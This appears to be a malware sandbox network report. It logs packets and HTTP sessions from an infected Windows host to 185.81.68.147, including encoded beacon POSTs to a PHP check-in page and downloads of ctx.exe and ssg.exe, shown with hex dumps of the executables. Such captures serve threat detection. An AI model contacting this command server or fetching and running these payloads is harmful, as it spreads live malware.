                                                                                                                                                                Dec 13, 2024 01:37:36.234503031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234527111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234553099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234565973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234596968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234781027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234810114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234826088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234853029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234865904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234891891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234905958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234930992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234955072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234977007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234991074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235018969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235043049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235192060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235228062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235297918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235330105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235342026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235363960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235418081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235445023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235457897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235490084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235544920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235569000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235588074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235619068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235631943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235657930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235671043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235701084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235872984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235898018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235910892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235939026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235951900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.235979080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236002922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236017942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236038923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236063004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236077070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236100912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236108065 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236119986 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236121893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236129045 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236144066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236212969 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236227036 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236236095 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236242056 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236248970 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236255884 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236316919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236346960 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236355066 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236411095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236426115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236495018 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236504078 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236510038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236510992 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236520052 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236625910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236641884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236668110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236685991 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236690044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236694098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236702919 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236711025 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236711979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.236718893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236726046 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236733913 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236742020 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236748934 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236756086 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236763954 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236772060 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236779928 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236788988 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236795902 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236804008 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236812115 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236819029 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236826897 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236835003 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236843109 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.236850023 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237060070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237076998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237076998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237107038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237118006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237147093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237160921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237184048 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237185955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237194061 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237201929 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237206936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237251043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237265110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237293959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237308025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237333059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237343073 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237351894 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237446070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237464905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237483025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237487078 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237497091 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237504005 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237510920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237513065 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237541914 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237601995 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237611055 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237617970 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237626076 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.237624884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.237639904 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.549704185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:00.295267105 CET259OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Dec 13, 2024 01:37:01.625020981 CET257INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:00 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 40
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 38 37 66 36 62 30 35 38 63 36 37 34 34 65 63 65 64 30 65 63 63 36 33 36 66 34 64 36 30 36 34 33 64 65 30 35 31 35 33 63
                                                                                                                                                                Data Ascii: 87f6b058c6744eced0ecc636f4d60643de05153c


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.549705185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:01.747220993 CET279OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 37
                                                                                                                                                                Dec 13, 2024 01:37:01.868757963 CET37OUTData Raw: 5a 58 12 4a 50 1e 04 44 52 06 4b 04 48 55 1f 55 18 71 29 25 2c 78 60 1b 36 77 18 57 5c 50 5b 5d 17 19 01 49 08
                                                                                                                                                                Data Ascii: ZXJPDRKHUUq)%,x`6wW\P[]I
                                                                                                                                                                Dec 13, 2024 01:37:03.409686089 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:02 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.549706185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:03.532355070 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:03.652638912 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:04.993227959 CET349INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:04 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 131
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 08 4b 0e 42 16 40 0f 17 4c 07 0f 01 1a 5d 52 4b 52 08 4b 52 57 01 1c 55 12 4c 4a 53 48 53 39 39 54 19 58 41 45 45 09 4c 17 06 5e 03 4c 08 04 16 55 0e 19 05 00 52 4c 16 17 57 4b 06 1b 53 3e 3c 57 48 0c 42 44 46 0e 1c 4b 54 08 00 1f 0d 02 4d 0e 0f 48 07 56 07 1a 4d 13 52 56 40 51 4b 06 1d 01 3d 6f 53 1f 5e 47 42 16 0e 4b 19 01 0e 01 1d 5c 54 1e 03 09 1b 02 57 0f 18 01 50 1a 1e 50 40 06 3b 3d
                                                                                                                                                                Data Ascii: KB@L]RKRKRWULJSHS99TXAEEL^LURLWKS><WHBDFKTMHVMRV@QK=oS^GBK\TWPP@;=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.549707185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:05.127501965 CET232OUTGET /ctx.exe HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Dec 13, 2024 01:37:06.461503029 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:05 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 15:45:48 GMT
                                                                                                                                                                ETag: "5a452c-628ec5ffff268"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 5915948
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd,bXg"(X@*OZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                Dec 13, 2024 01:37:06.461520910 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.L
                                                                                                                                                                Dec 13, 2024 01:37:06.461905956 CET1236INData Raw: 48 85 c0 75 15 48 8d 56 12 48 8d 0d da a7 02 00 e8 4d 15 00 00 e9 02 01 00 00 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cc e8 37 e9 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 e4 a7 02 00 48 8d 0d 19 a8 02 00 e8 88 16 00 00 e9 af 00 00 00 8b 4e 0c
                                                                                                                                                                Data Ascii: HuHVHMVE3HI7yLFHHN0LHu DNLFHHX~uME3HIW^Lt$PMHt; DH;HMAHGIH^HrhL H+uH|$`Lt$Pt
                                                                                                                                                                Dec 13, 2024 01:37:06.461925030 CET1236INData Raw: 48 48 8b 6c 24 40 4c 8b 64 24 50 85 c0 74 0b 49 8b ce e8 e3 2b 01 00 45 33 f6 49 8b cf e8 e8 dd 00 00 48 8b 5c 24 58 49 8b c6 48 83 c4 20 41 5f 41 5e 5e c3 4c 8d 46 12 48 8d 15 57 a2 02 00 48 8d 0d 84 a2 02 00 e8 b3 11 00 00 b8 ff ff ff ff eb aa
                                                                                                                                                                Data Ascii: HHl$@Ld$PtI+E3IH\$XIH A_A^^LFHWH@SWH8znHHu$xyHWH_H8_[HnLd$`Ie)LHu(LGHRH6Ld$`H8_[H2L|$ H!)LH
                                                                                                                                                                Dec 13, 2024 01:37:06.461945057 CET1236INData Raw: 2c 4c 8d 05 ee 9f 02 00 0f c8 89 44 24 2c ba 40 00 00 00 8b 44 24 30 0f c8 89 44 24 30 8b 44 24 34 0f c8 89 44 24 34 89 83 1c 10 00 00 e8 88 01 00 00 8b 44 24 28 45 33 c0 48 2b f0 48 8b cf 48 8d 46 58 48 89 83 00 10 00 00 8b 54 24 2c 48 03 d0 e8
                                                                                                                                                                Data Ascii: ,LD$,@D$0D$0D$4D$4D$(E3H+HHFXHT$,HhL$0&HHuHHeT$0LAHHsH}HJyD$0HHH*tHgHH;
                                                                                                                                                                Dec 13, 2024 01:37:06.462086916 CET1236INData Raw: 50 20 00 00 48 8b 8f 28 20 00 00 ba 72 01 00 00 41 b8 01 00 00 00 ff 15 1a 95 02 00 4c 8b 87 48 20 00 00 4d 85 c0 74 72 48 8b 4f 08 ba 30 00 00 00 41 b9 01 00 00 00 ff 15 f9 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 30 20 00 00 ba
                                                                                                                                                                Data Ascii: P H( rALH MtrHO0ALH AH0 0LH AH8 0LH AH@ 0H0 LO(E3LO E3H8 jHOHT$`tDD$lHT$hfD+D$d
                                                                                                                                                                Dec 13, 2024 01:37:06.462104082 CET1236INData Raw: 24 50 4c 8d 0d 49 fc ff ff 48 8d 44 24 30 45 33 c0 48 8d 95 a0 1f 00 00 48 89 44 24 20 48 8b cf ff 15 2c 90 02 00 48 8b 4c 24 40 48 8b d8 e8 4b 1d 01 00 48 8b 4c 24 48 e8 41 1d 01 00 48 8b 4c 24 50 e8 37 1d 01 00 48 8b 8d 78 1f 00 00 48 85 c9 74
                                                                                                                                                                Data Ascii: $PLIHD$0E3HHD$ H,HL$@HKHL$HAHL$P7HxHtHHtH H3H!A^_^[]H\$Hl$Ht$H|$ AVH 3IHDHtE33bHHtE33HaLHtE33HaH
                                                                                                                                                                Dec 13, 2024 01:37:06.462121010 CET1236INData Raw: 24 30 4c 8b cb 48 c7 44 24 20 00 00 00 00 41 b8 00 04 00 00 48 8b 08 48 83 c9 02 e8 d2 13 01 00 41 b8 00 04 00 00 48 8d 94 24 30 04 00 00 48 8d 4c 24 30 e8 c6 5d 00 00 33 c9 41 b9 30 00 00 00 48 85 c0 74 17 4c 8d 05 52 93 02 00 48 8d 94 24 30 04
                                                                                                                                                                Data Ascii: $0LHD$ AHHAH$0HL$0]3A0HtLRH$0LHT$0H$0H3@HH_[LIKISMCMK SWHHHH3H$0HI{H|$(HT$0LHD$ AHHVA0
                                                                                                                                                                Dec 13, 2024 01:37:06.462136984 CET1236INData Raw: 02 00 e8 63 f8 ff ff b8 ff ff ff ff e9 6b 01 00 00 48 89 9c 24 98 10 00 00 48 8b 9e 08 10 00 00 48 89 ac 24 a0 10 00 00 48 89 bc 24 a8 10 00 00 4c 89 b4 24 60 10 00 00 48 3b 9e 10 10 00 00 0f 83 15 01 00 00 0f 1f 44 00 00 80 7b 11 73 0f 85 eb 00
                                                                                                                                                                Data Ascii: ckH$HH$H$L$`H;D{sHH[HHxLsLt$(M" LD$ \HL$P=)HHL$P$H%IHLHHHSHH
                                                                                                                                                                Dec 13, 2024 01:37:06.462343931 CET1236INData Raw: 48 8d 84 24 d0 00 00 00 48 8b cd 4c 8d 8c 24 d0 10 00 00 48 89 44 24 20 4c 8d 84 24 d0 20 00 00 48 8d 54 24 30 e8 bc 08 00 00 eb 40 4c 8d 47 12 48 8d 94 24 d0 10 00 00 48 8d 8c 24 d0 20 00 00 e8 61 0b 00 00 41 3b c4 48 8d b4 24 d0 10 00 00 41 0f
                                                                                                                                                                Data Ascii: H$HL$HD$ L$ HT$0@LGH$H$ aA;H$ADL$HIu+HIHI;8H'HWHVHHwAH$ 1L$0L$0L$0H$(1H$
                                                                                                                                                                Dec 13, 2024 01:37:06.581523895 CET1236INData Raw: 20 00 00 41 5e 5f 5e c3 48 8d 15 37 81 02 00 48 8d 4f 10 e8 2a 08 00 00 48 8b d8 48 85 c0 74 37 48 8b 0d 03 9c 02 00 48 8d 54 24 50 48 89 4c 24 50 41 b8 08 00 00 00 48 c1 e9 18 80 c1 0d 88 4c 24 53 48 8b c8 e8 28 3f 00 00 48 85 c0 75 22 48 8b cb
                                                                                                                                                                Data Ascii: A^_^H7HO*HHt7HHT$PHL$PAHL$SH(?Hu"HH_HHXsHHLOLs2H|H@uH8pkgH HHHHOxKH80HuH


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.549711185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:16.448924065 CET232OUTGET /ssg.exe HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Dec 13, 2024 01:37:17.775022984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:17 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                ETag: "4b200-629107cd804d2"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 307712
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: application/x-msdownload
